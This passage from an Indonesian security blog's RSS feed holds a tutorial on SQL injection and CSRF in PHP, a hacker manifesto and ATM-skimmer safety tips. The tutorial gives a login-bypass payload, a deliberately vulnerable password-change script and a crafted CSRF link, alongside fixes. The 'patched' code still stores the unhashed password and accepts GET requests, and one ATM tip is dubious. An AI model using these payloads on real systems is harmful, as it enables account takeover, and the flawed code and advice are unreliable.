<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">dan untuk mengamankannya adalah dengan melakukan filtering pada keduavariabel &#8220;username&#8221; dan &#8220;password&#8221;<br />
PHP Code:$username = stripslashes($username);$username = mysql_escape_string($username);$password = stripslashes($password);$password = mysql_real_escape_string($password);|&#8212;-| Untuk memperkuatnya, seandainya ada yang terlewat, melakukan setting| &#8220;On&#8221; untuk| magic_quotes_gpc| pada setting PHP.ini|&#8212;-</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">Masukkan &#8216;or &#8216;1=1&#8221; (l33t) pada input box username/password untuk membypasslogin, sehingga rikues akan jadi seperti ini<br />
|&#8212;-|<br />
PHP Code:SELECT username, password FROM member WHERE username = &#8221;or&#8217;1=1&#8221;&#8217; AND password = &#8221;or&#8217;1=1&#8221;&#8217;|&#8212;<br />
Selanjutnya, anda simpulkan sendiri</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
===// Cross Site Requesr Forgery \\===</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">Kode berikut adalah mempertunjukkan sebuah halaman ganti password untuk admin, yang tidak melakukan pemeriksaan password saat ini, sehingga memungkinkan celah CSRF digunakan.</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ganti.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&lt;?php<br />
if (isset($_GET[&#8216;ganti&#8217;])) {$pwd_baru = $_GET[&#8216;pwd_baru&#8217;];$pwd_baru2 = $_GET[&#8216;pwd_baru2&#8217;];<br />
if (($pwd_baru == $pwd_baru2)){$pwd_baru = mysql_real_escape_string($pwd_baru);$pwd_baru = md5($pwd_baru);<br />
$insert=&#8221;UPDATE `users` SET pwd = &#8216;$pwd_baru&#8217; WHERE user = &#8216;admin&#8217;;&#8221;;$result=mysql_query($insert) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
echo &#8220;&lt;pre&gt;Password Admin Berubah &lt;/pre&gt;&#8221;;mysql_close();}else{echo &#8220;&lt;pre&gt; Password tidak cocok. &lt;/pre&gt;&#8221;;}<br />
}?&gt;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8211;//<br />
Adapun untuk memperbaikinya adalah, dengan melakukan pemeriksaan password saat ini terlebih dahulu sebelum merubah password</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;&#8211;\\ganti-patch.php</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">PHP Code:</span></p>
<blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&lt;?php<br />
if (isset($_GET[&#8216;ganti&#8217;])) {$pwd = $_GET[&#8216;pwd&#8217;];$pwd_baru = $_GET[&#8216;pwd_baru&#8217;];$pwd_baru2 = $_GET[&#8216;pwd_baru2&#8242;];<br />
$pwd = stripslashes( $pwd );$pwd = mysql_real_escape_string( $pwd );$pwd = md5( $pwd );<br />
// Periksa password saat ini (pwd)$qry = &#8220;SELECT pwd FROM `users` WHERE user=&#8217;admin&#8217; AND pwd=&#8217;$pwd&#8217;;&#8221;;$result = mysql_query($qry) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
if (($pwd_baru == $pwd_baru2) &amp;&amp; ( $result &amp;&amp; mysql_num_rows( $result ) == 1 )){$pwd_baru = mysql_real_escape_string($pwd_baru);$pass_new = md5($pwd_baru);<br />
$insert=&#8221;UPDATE `users` SET pwd = &#8216;$pwd_baru&#8217; WHERE user = &#8216;admin&#8217;;&#8221;;$result=mysql_query($insert) or die(&#8216;&lt;pre&gt;&#8217; . mysql_error() . &#8216;&lt;/pre&gt;&#8217; );<br />
echo &#8220;&lt;pre&gt; Password Admin Berubah &lt;/pre&gt;&#8221;;mysql_close();}<br />
else{echo &#8220;&lt;pre&gt; Passwords Baru tidak cocok atau password lama anda salah. &lt;/pre&gt;&#8221;;}<br />
}?&gt;</span></p>
</blockquote>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">&#8212;&#8212;&#8212;//</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
&#8212;&#8212;// Eksploitasi \\&#8212;&#8212;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">Adapun cara eksploitasinya adalah melibatkan kelalaian sang admin, umumnya attacker akan mengirim link tersbut ke email, atau melalui forum dsb dengan harapan sang admin akan meng-click-nya.<br />
Code:&lt;a href=http://nice.ang.el/ganti.php?pwd=&amp;pwd_baru=dudul&amp;pwd_baru2=dudul&amp;ganti=ganti#&gt;klik saya&lt;/a&gt;</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">===// Penutup \\===</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">Oke, saya harap anda semua yang membaca akan pusing, dan disinilah orang-orang terpilih akan mengikis pembaca lainnya, yup, dengan cepat anda akan segera mencoba dan mencari tahu apa yang saya tulis disini, google! sejak awal di luncurkan adalah referensi terbaik.<br />
Pelajari berbagai fungsi-fungsi yang saya singgung diatas, secara pelan dan jangan terburu-buru , selebihnya selamat datang di dunia web aplikasi yang &#8216;penuh dengan intrik-intrik, dan semoga sedikit dari saya dapat bermanfaat untuk semua. Logika anda sangat di perlukan disini!</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><br />
===// Reference \\===</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">[1].google.inc,</span> <span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><a href="http://google.com" rel="">http://google.com</a></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><span style="mso-bidi-font-size: 11.0pt; color: blue;"><span style="color: #000000;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">[2].OWASP, &#8220;The Open Web Application Security Project&#8221;,</span> <span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><a href="http://owasp.org" rel=""><span style="mso-bidi-font-size: 11.0pt; color: blue;">http://owasp.org</span></a></span></span></span></span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">[3].semua web aplikasi yang telah saya lihat kode php-nya</span></p>
<p class="MsoNormal" style="mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; line-height: 14.25pt; background: white;"><span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">Copas dari</span> <span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><a href="http://ezine.echo.or.id/ezine21/e21_005.txt" target="_self" rel=""><span style="mso-bidi-font-size: 11.0pt; color: blue;">http://ezine.echo.or.id/ezine21/e21_005.txt</span></a><br />
dan diambil dari</span> <span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;"><a href="http://www.indonesianhacker.org/showthread.php?t=529" target="_self" rel=""><span style="mso-bidi-font-size: 11.0pt; color: blue;">sumber</span></a></span> <span style="font-size: 10.0pt; font-family: &amp;amp; amp; mso-fareast-font-family: &amp;amp; amp; mso-bidi-font-family: &amp;amp; amp; color: black; mso-fareast-language: IN;">.<br />
Semoga bermanfaat.</span></p>
<p>Posting <a href="https://www.james0baster.web.id/2010/02/23/web-security-yin-yang-attacking-defending/">Web Security Yin-Yang (Attacking &#038; Defending)</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2010/02/23/web-security-yin-yang-attacking-defending/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Manifesto Seorang Hacker</title>
		<link>https://www.james0baster.web.id/2010/02/09/manifesto-seorang-hacker/</link>
					<comments>https://www.james0baster.web.id/2010/02/09/manifesto-seorang-hacker/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Tue, 09 Feb 2010 08:55:08 +0000</pubDate>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=80</guid>

					<description><![CDATA[<p>Manifesto Seorang Hacker: Ini adalah dunia kami sekarang, dunianya electron dan switch, keindahan sebuah baut. Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami criminal. Kami menjelajah, dan kalian sebut kami criminal. Kami mengejar pengetahuan, dan [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/02/09/manifesto-seorang-hacker/">Manifesto Seorang Hacker</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="http://www.james0baster.web.id/wp-content/uploads/2010/02/not_the_linux_file_system.jpg"><img loading="lazy" decoding="async" class="size-full wp-image-48 alignleft" title="Manifesto Seorang Hacker" src="http://www.james0baster.web.id/wp-content/uploads/2010/02/not_the_linux_file_system.jpg" alt="Manifesto Seorang Hacker" width="343" height="256" /></a>Manifesto Seorang Hacker: Ini adalah dunia kami sekarang, dunianya electron dan switch, keindahan sebuah baut.</p>
<p>Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami criminal.<span id="more-798"></span><br />
Kami menjelajah, dan kalian sebut kami criminal.<br />
Kami mengejar pengetahuan, dan kalian sebut kami criminal.<br />
Kami hadir tanpa perbedaan warna kulit, kebangsaan ataupun prasangka keagamaan, dan kalian sebut kami criminal.<br />
Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, kalian berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut criminal.<br />
Ya, aku memang seorang criminal.<br />
Kejahatanku adalah rasa keingintahuanku.<br />
Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakana dan pikirkan, bukan pada penampilan mereka.<br />
Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan.<br />
Aku memang seorang hacker, dan inilah manifesto saya.<br />
Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.<br />
Bagaimanapun juga, kami semua senasib seperjuangan.</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/02/09/manifesto-seorang-hacker/">Manifesto Seorang Hacker</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2010/02/09/manifesto-seorang-hacker/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kasus Pembobolan Mesin ATM (Teknologi Skimmer)</title>
		<link>https://www.james0baster.web.id/2010/02/02/kasus-pembobolan-mesin-atm-teknologi-skimmer/</link>
					<comments>https://www.james0baster.web.id/2010/02/02/kasus-pembobolan-mesin-atm-teknologi-skimmer/#respond</comments>
		
		<dc:creator><![CDATA[james0baster]]></dc:creator>
		<pubDate>Tue, 02 Feb 2010 08:08:58 +0000</pubDate>
				<category><![CDATA[Computer]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[hack]]></category>
		<guid isPermaLink="false">http://www.james0baster.web.id/v2/?p=30</guid>

					<description><![CDATA[<p>sekarang lagi heboh hebonya tentang pembobolan Mesin ATM. sekedar berkeliling mencari informasi tentang pembobolan tersebut, ternyata di dunia maya(internet) memiliki banyak informasi tentang hal tersebut berikut akan saya tunjukan hasil hasil penyelusuran saya di internet. walah sebelumnya saya beritahu terlebih dahulu bahwa mesin skimmer terjual bebas di internet , gimana tidak maraknya pembobolan kalo alatnya [&#8230;]</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/02/02/kasus-pembobolan-mesin-atm-teknologi-skimmer/">Kasus Pembobolan Mesin ATM (Teknologi Skimmer)</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>sekarang lagi heboh hebonya tentang pembobolan Mesin ATM. sekedar berkeliling mencari informasi tentang pembobolan tersebut, ternyata di dunia maya(internet) memiliki banyak informasi tentang hal tersebut berikut akan saya tunjukan hasil hasil penyelusuran saya di internet.<span id="more-30"></span></p>
<p>walah sebelumnya saya beritahu terlebih dahulu bahwa mesin skimmer terjual bebas di internet , gimana tidak maraknya pembobolan kalo alatnya aja sudah terjual bebas <a href="http://www.indoforum.org/showthread.php?p=1601861" target="_blank">http://www.indoforum.org/showthread.php?p=1601861</a></p>
<p>penjelasan pemakaian alat tersebut pun sudah tersebar di internet melalui video yang terdapat di youtube <a href="http://www.youtube.com/watch?v=m3qK46L2b_c&amp;feature=related" target="_blank">http://www.youtube.com/watch?v=m3qK46L2b_c&amp;feature=related</a> dan<a href="http://www.youtube.com/watch?v=tS80yLWdOhA"> http://www.youtube.com/watch?v=tS80yLWdOhA</a></p>
<p>setelah membaca baca saya mempunyai saran/tips untuk pengambilan uang di ATM.</p>
<p>1.Lihat ke sekeliling ruang ATM, mungkin ada hal2 yg mencurigakan seperti kamera tersembunyi (tentunya bukan kamera ATM itu sendiri). Kamera ATM selalunya dipasang diatas bagian belakang/agak nyamping mesin ATM. Ini berfungsi untuk mengcapture wajah pengguna ATM. Kalau ada Kamera yg posisinya berbeda kita harus lebih hati2 jgn2 itu merupakan kamera untuk melihat pergerakan jari kita untuk menekan Pin ATM</p>
<p>2.Setelah melakukan transaksi ATM (kartu ATM sudah keluar), biasakannya memasukkan kembali kartu anda ke dalam mesin ATM.  Kemudian masukkan pin yg acak (salah) dan tekan cancel. Lakukan 2 &#8211; 3 kali untuk lebih amannya. Teknologi yg dipakai untuk pencurian  Identitas (nomor pin) biasanya hanya merekam transaksi terakhir dari mesin ATM termasuk memasukkan nomor pin.  So, karena pada transaksi terakhir kita memasukkan nomor pin yg salah, otomatis kartu ATM kita nggak bisa di hacked.</p>
<p>3.Untuk ATM mandiri, bisa mengikuti SMS banking. Hanya untuk cara ini hanya memberikan SMS ke kita kalo ada transaksi &gt;= Rp. 1 jt.</p>
<p>Alat yg menempel pada mesin Atm mandiri DIDUGA merupakan alat yang dapat mencopy data pada kartu atm dan nomor pin nasabah yang telah melakukan transaksi di mesin atm tersebut.</p>
<p>Alat tersebut diduga pernah dipasang di mesin ATM Mandiri di : Top 100 Penuin dan Mall BCS. Segera blokir kartu Atm melalui Call Mandiri 14000 apabila anda merasa telah melakukan transaksi di ATM yang terdapat alat tambahan dan hubungi kantor cabang Bank Mandiri terdekat untuk mengganti kartu ATM. <strong>(www.resep.web.id)</strong></p>
<p><strong><img loading="lazy" decoding="async" class="alignnone" src="http://www.resep.web.id/wp-content/uploads/2009/01/skimmer-1.jpg" alt="Skimmer Mesin ATM" width="420" height="310" /></strong></p>
<p>Ada slot <strong>Card reader</strong>, berguna untuk membaca kartu dan selanjutnya digandakan.</p>
<p><img loading="lazy" decoding="async" class="alignnone" src="http://www.resep.web.id/wp-content/uploads/2009/01/skimmer-4.jpg" alt="Skimmer Mesin ATM 1" width="420" height="331" /></p>
<p>Perhatikan tempat brosur diatas, biasa juga bukan? <strong>Tidak!</strong> Panah merah, disanalah Kamera pengintai telah dipasang. Kamera mengarah ke Monitor dan Keyboard ATM, hasil rekaman akan dikirim dengan jaringan tanpa kabel.</p>
<p><img loading="lazy" decoding="async" class="alignnone" src="http://www.resep.web.id/wp-content/uploads/2009/01/skimmer-5.jpg" alt="Skimmer Mesin ATM 2" width="420" height="253" /></p>
<p>Diatas adalah gambar dari kotak brosur setelah dibuka</p>
<p>Posting <a href="https://www.james0baster.web.id/2010/02/02/kasus-pembobolan-mesin-atm-teknologi-skimmer/">Kasus Pembobolan Mesin ATM (Teknologi Skimmer)</a> ditampilkan lebih awal di <a href="https://www.james0baster.web.id">james0baster.web.id</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.james0baster.web.id/2010/02/02/kasus-pembobolan-mesin-atm-teknologi-skimmer/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
	</channel>
</rss>
